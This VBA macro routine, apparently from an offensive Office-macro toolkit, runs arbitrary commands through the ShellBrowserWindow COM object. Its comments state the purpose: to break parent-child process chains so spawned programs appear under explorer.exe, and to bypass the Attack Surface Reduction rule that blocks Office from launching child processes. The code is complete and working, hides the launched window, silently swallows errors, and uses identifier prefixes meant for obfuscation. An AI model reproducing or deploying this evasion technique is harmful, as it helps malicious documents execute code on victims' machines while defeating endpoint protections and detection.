'
' This technique offers Parent-Child process dechaining by launching commands
' through the shellBrowserWindow COM object. Process created that way will be
' childs of the explorer.exe process.
'
' Allows to dechain Parent-Child relationship, spawned command will be child of explorer.exe. 
' Bypasses ASR rule blocking Office applications from creating child processes.
'
Sub obf_LaunchCommand(ByVal obf_command As String)
    On Error GoTo obf_ProcError
    Dim obf_App, obf_endQuotePos, obf_args, obf_spaceChar
    Dim obf_cmd
    
    obf_cmd = obf_command
	obf_args = ""
	obf_App = Trim(obf_cmd)
	obf_endQuotePos = InStr(2, obf_cmd, """")
	obf_spaceChar = InStr(1, obf_cmd, " ")

	If Left(obf_cmd, 1) = """" And obf_endQuotePos > 0 Then
	    obf_App = Trim(Mid(obf_cmd, 2, obf_endQuotePos - 2))
	    obf_args = Trim(Mid(obf_cmd, obf_endQuotePos + 1))
	ElseIf obf_spaceChar > 0 Then
	    obf_App = Trim(Mid(obf_cmd, 1, obf_spaceChar - 1))
	    obf_args = Trim(Mid(obf_cmd, obf_spaceChar + 1))
	End If

    With CreateObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
        .Document.Application.ShellExecute obf_App, obf_args, "", Null, 0
    End With
obf_ProcError:
End Sub
